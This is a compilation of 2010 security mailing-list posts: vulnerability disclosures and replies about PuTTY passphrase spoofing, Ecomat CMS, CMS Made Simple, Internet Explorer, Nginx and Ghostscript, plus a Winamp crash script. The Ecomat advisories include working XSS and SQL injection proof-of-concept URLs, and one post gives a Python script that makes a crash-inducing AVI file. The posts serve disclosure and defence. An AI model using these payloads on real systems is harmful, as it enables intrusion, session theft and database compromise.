Couldn't this also be thwarted by having a MOTD? It generally displays before the bashrc if I'm not mistaken. -- Rob Fuller | Mubix Room362.com | Hak5.org On Mon, May 31, 2010 at 8:47 PM, Jan Schejbal wrote: > PuTTY, a SSH client for Windows, requests the passphrase to the ssh key in > the console window used for the connection. This could allow a malicious > server to gain access to a user's passphrase by spoofing that prompt. > > We assume that the user is using key-bases ssh auth with ssh and connects > using PuTTY. PuTTY now asks for the passphrase to the key. The user enters > the passphrase. If the passphrase is wrong, PuTTY will now request the > passphrase again after stating that it was wrong. If the passphrase is > correct, the connection to the server is established. > > A malicious/manipulated server could then display "Wrong passphrase" and ask > for the passphrase again. If the user enters it again, it is sent to the > malicious server. > > As far as I can see, there are only two ways how the user might detect it: > > 1. The real "Wrong passphrase" message is displayed without delay. After > entering the correct passphrase, a small delay occurs. > > 2. The prompt contains the name of the key as stored on the client. Often > the same name is used in the authorized_keys file on the server, giving it > to the attacker. Maybe it is also possible for the server to remotely read > the screen contents or duplicate it using some xterm control sequences, so > users should not rely on it. > > (See also the attached screenshot, where you can see that there is no > visible difference.) > > I assume that there are more similar issues like this one using different > authentication modes etc. > > This can be exploited using a modified .bashrc file. This means that once an > attacker has gained access to a user account on the server, he can try this > to gain the passphrase to the key. > > Impact: > Low. > As a malicious server is required, the attack probability is not very high. > Without the keyfile, the passphrase is worthless to the attacker unless it > is used in multiple places. However, key-based auth is supposed to be secure > even with untrusted/malicious servers. > > Developer notification: > The possibility of such spoofing attacks is known: > http://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/gui-auth.html > > Workaround: > Load the key into the Pageant agent before esablishing the connection > > Other software affected: > Probably many console-based SSH tools have similar issues. > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
XSS vulnerability in Ecomat CMS
Vulnerability ID: HTB22391 Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_ecomat_cms.html Product: Ecomat CMS Vendor: Codefabrik GmbH Vulnerable Version: 5.0 and Probably Prior Versions Vendor Notification: 18 May 2010 Vulnerability Type: XSS (Cross Site Scripting) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA (http://www.htbridge.ch/) Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the "index.php" script to properly sanitize user-supplied input in "lang" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: http://host/index.php?type=web&lang=xx%22+onmouseover=alert%28123%29+style=position:absolute;left:0;top:0;width:100%;height:100%+&show=25&mhs=0
SQL injection vulnerability in Ecomat CMS
Vulnerability ID: HTB22390 Reference: http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_ecomat_cms.html Product: Ecomat CMS Vendor: Codefabrik GmbH Vulnerable Version: 5.0 and Probably Prior Versions Vendor Notification: 18 May 2010 Vulnerability Type: SQL Injection Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: High Credit: High-Tech Bridge SA (http://www.htbridge.ch/) Vulnerability Details: The vulnerability exists due to failure in the "index.php" script to properly sanitize user-supplied input in "show" variable. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database. Attacker can use browser to exploit this vulnerability. The following PoC is available: http://host/index.php?type=web&lang=de&show=-1+union+select+user%28%29+--+&mhs=0
DoS vulnerability in Internet Explorer
Hello Bugtraq! I want to warn you about Denial of Service vulnerability in Internet Explorer. Which I already disclosed at my site in 2008 (at 29.09.2008). But recently I made new tests concerning this vulnerability, so I decided to remind you about it. I know this vulnerability for a long time - it's well-known DoS in IE. It works in IE6 and after release of IE7 I hoped that Microsoft fixed this hole in seventh version of the browser. But as I tested at 29.09.2008, IE7 was also vulnerable to this attack. And as I tested recently, IE8 is also vulnerable to this attack. Also I informed Microsoft at 01.10.2008 about it, but they ignored and didn't fix it. They didn't fix the hole not in IE6, nor in IE7, nor in IE8. That time I published about this vulnerability at SecurityVulns (http://securityvulns.com/Udocument636.html). DoS: Vulnerability concerned with handling by browser of expression in styles, which leads to blocking of work of IE. http://websecurity.com.ua/uploads/2008/IE%20DoS%20Exploit4.html Vulnerable versions are Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.0.6000.16711), Internet Explorer 8 (8.0.7600.16385) and previous versions. To Susan Bradley from Bugtraq: This is one of those cases, which I told you before, when browser vendors ignore to fix DoS holes in their browsers for many years. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua
[Bkis-02-2010] Multiple Vulnerabilities in CMS Made Simple - Bkis
[Bkis-02-2010] Multiple Vulnerabilities in CMS Made Simple 1. General information CMS Made Simple is a free content management system (CMS) written in PHP, available at www.cmsmadesimple.org. In March, 2010, Bkis Security discovered some XSS and CSRF vulnerabilities in CMS Made Simple 1.7.1. Taking advantage of these vulnerabilities, hacker is able to insert pieces of code into the path's link to execute in user's browser, causing the loss of cookies and session. Hacker is also able to trick users into manipulating some of the system's functions without users' knowledge. Bkis has informed the CMS Made Simple's development team of these vulnerabilities. Details: http://security.bkis.com/multiple-vulnerabilities-in-cms-made-simple/ SVRT Advisory: Bkis-02-2010 Initial vendor notification: 05/12/2010 Release Date: 06/21/2010 Update Date: 06/21/2010 Discovered by: Truong Thao Nguyen, Do Hoang Bach, Cao Xuan Sang Attack Type: XSS, CSRF Security Rating: High Impact: Code Execution Affected Software: CMS Made Simple (version <= 1.7.1) 2. Technical details The XSS vulnerability is found in the following modules: - Add Pages - Add Global Content - Edit Global Content - Add Article - Add Category - Add Field Definition - Add Shortcut Since the input variants of this function are not carefully checked and filtered, hacker is able to insert pieces of code into the path's link. When users sign in and click this link, the malicious code (JavaScript) will be executed, leading to the loss of cookies, session, etc. The CSRF vulnerability is found in the following module: - Changes group permission Since a task is performed without seeking users' prior permission first, users can be tricked into performing a task without awareness. Thus, hacker is able to perform malicious actions via legitimate users. In addition, the vulnerabilities are all found in content management section of CMSMadeSimple. Thus, the victims of such vulnerabilities are the system's administrators, editors and designers. 3. Solution CMSMadeSimple's development team has not issued the patches for these vulnerabilities yet. Thus, Bkis strongly recommends individuals and organizations that use this software to take caution when receiving links, and at the same time keep track of the information about the latest software version to update. Bui Quang Minh Manager - Vuln Team - Bkis Security - Bkis Office : Hitech building - 1A Dai Co Viet, Hanoi Email : min...@bkav.com.vn Website : www.bkav.com.vn; www.bkav.com Blog : security.bkis.com
Re: Nginx 0.8.35 Space Character Remote Source Disclosure
Does not work on 0.7.65. On Mon, May 31, 2010 at 11:00 AM, wrote: > what about the stable branch? Versions 0.7.65 and earlier? >
RE: Nginx 0.8.35 Space Character Remote Source Disclosure
Looks like this affected Windows only, and was fixed a while ago. Changes with nginx 0.7.6501 Feb 2010 *) Security: now nginx/Windows ignores trailing spaces in URI. Thanks to Dan Crowley, Core Security Technologies. -Original Message- From: abc12...@hushmail.com [mailto:abc12...@hushmail.com] Sent: Monday, May 31, 2010 11:00 AM To: bugtraq@securityfocus.com Subject: Re: Nginx 0.8.35 Space Character Remote Source Disclosure what about the stable branch? Versions 0.7.65 and earlier?
Re: DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera
Hi Mustlive, I'm not sure if there's a need to discuss or clarify this any further. Please refer to my earlier posts, and for the sake of saving some of our time & efforts, avoid drawing tangents about scripts and noscripts (I've clarified both earlier) & weasel words (security vulnerability and nntp exploit - irrelevent in this case). JS or no-JS, this issue is nothing new, this behavior is well-defined and a necessity and definitely not a URI (of any kind) exploit or a security vulnerability. Some last specifics (mostly reiterating what I said in my earlier posts) - 1. You can take this issue up with the content aggregators (CDN etc) and or website programmers, this is not an issue to be addressed by the webbrowsers because the solution of it remains imperfect in theory (one of my posts have a 'workaround'...maybe a 'good to have' feature which WILL open up another can of worms...). 2. Now the even vague non-scripted issue which you insist upon - If you are trying to say that a 1000 lines of (which is executed sequentially by any JVM as a fact) is an 'exploit' and 'security vulnerability', isn't there a HUGE point missing? NOTE: again, I'm not sure why you claim its an 'nntp' exploit. As I noted earlier, its applicable to any uri handler and their behaviour is nothing unexpected. 3. Your POC had used JS and is non-functional without scripting enabled. It was taken offline since I last checked (my 2nd last post?), which should have been your sample reference for this discussion (its appearing to shift now). Best Regards, w -- From: "MustLive" Sent: Monday, May 31, 2010 9:33 PM To: "Susan Bradley" Cc: Subject: Re: DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera Hello Susan and other readers, who replied to my previous advisory. Earlier I've already answered Vladimir, now I'd answer Susan and soon I'd answer John. But now one important note to every reader of the list, including John Smith. Which I already wrote about 1,5 week ago (after posting of a first advisory about DoS in browsers) to one reader of Full-disclosure who inattentively read that advisory (he missed message about attacking without JS) and also to Mozilla (who became discussing this issue and only drew attention to attacking with JS vector). That, as I wrote in both advisories, this attack via iframes can also be conducted without JavaScript. So even turning JS off will not help. Due to advantages of JS exploit for these vulnerabilities over non-JS exploit, I wrote JavaScript exploits for these advisories and I'd write for future advisories (but I'd be reminding about possibility of attacking without JS). But soon I'll present one exploit also in "pure-iframe" version (without JS) for Internet Explorer and other applications - in case when small amount of iframes lead to crash. Thank you. Now if you could wait for patches before disclosing I'd be even happier. Susan, you are welcome. I would be happy to wait for patches of browser vendors, but as already told you in details, it's not possible due to behavior of browser vendors. All they mostly ignore such holes, all they don't count DoS as vulnerabilities, they called them "stability issues" and so don't attend to them seriously (and not fixing or fixing slowly). I don't respect such statement as "stability issues" for DoS holes, and during 2008-2010 I worked hard to change vendors' mind on this issue, but they still ignore it. Also, as I already told you, they never told if they fixed or not such holes (especially taking into account that they almost always ignore my letters with such holes or, as Opera did few times, answering with "it's stability issues" statement). So I have no possibility to know from them if they fixed it or not - and because they don't care about such issues (ignoring them or calling them stability issues), they never mentioned about them in vendors advisories. Only one time Microsoft informed me about fixing DoS hole in Outlook - even they called it stability issue they informed me after they released a patch for it (which was serious approach, but not Microsoft for IE, nor other vendors use such approach for DoS holes in browsers). But take into account that I informed (at 26.05.2010) all four browser vendors about many vulnerabilities, which I'll disclose in the future. So they are informed for long time in advance :-). And so you have no need to worry, because with every day they become more and more "informed long time ago" and have more and more days to fix these holes. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua - Original Message - From: "Susan Bradley" To: "MustLive" Cc: Sent: Friday, May 28, 2010 7:06 PM Subject: Re: [Suspected Spam]DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera Thank you. Now if you could wait for patches before disclos
RE: Ghostscript 8.64 executes random code at startup
> From: paul.sz...@sydney.edu.au [mailto:paul.sz...@sydney.edu.au] > Sent: Sunday, 30 May, 2010 06:50 > > I also see no -P- and no absolute paths for the ps files mentioned in > many "gs scripts" e.g. /usr/bin/pdf2dsc or /usr/bin/ps2ascii . Also, > crappy coding for "GS_EXECUTABLE=gs". Am not sure if these are > "originally gs" or "Debian special". I believe they're all part of the standard Ghostscript distribution; at any rate, they're in the Windows Ghostscript distribution I have installed here. The Windows scripts (gs*\lib\*.bat) are similarly vulnerable: no use of -P-, and letting the executable name be overridden by an environment variable. -- Michael Wojcik Principal Software Systems Developer, Micro Focus
Winamp v5.571 malicious AVI file handling DoS Vulnerability
# Tested on Windows 7 and Winamp v5.571(x86)
# This bug is informed to Nullsoft and was fixed long back.
# The status can be found at
http://forums.winamp.com/showthread.php?s=&threadid=316000
# This code works on Python 3.0. To make it work on <3.0 remove braces in print
print("\n***Winamp v5.571 malicious AVI file handling DoS Vulnerability***\n")
try:
open('winampcrash.avi', 'w')
print ("Creating malicious AVI file . . . \n")
print ("Successfully created Zero size AVI file\n")
print ("Open created Zero size AVI file in Winamp.Boom\n\n")
except IOError:
print ("Unable to create Zero size AVI file\n")
"""
Following is the WinDBG status when we open winampcrash.AVI file in Winamp
v5.571(x86)
(f00.e60): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax= ebx= ecx= edx= esi=0886fe68 edi=02880618
eip=076243f1 esp=0886fc50 ebp=0886ff28 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
in_AVI!winampGetInModule2+0x13da:
076243f1 8b4008 mov eax,dword ptr [eax+8] ds:002b:0008=
"""
#Best Regards,
#Praveen Darshanam
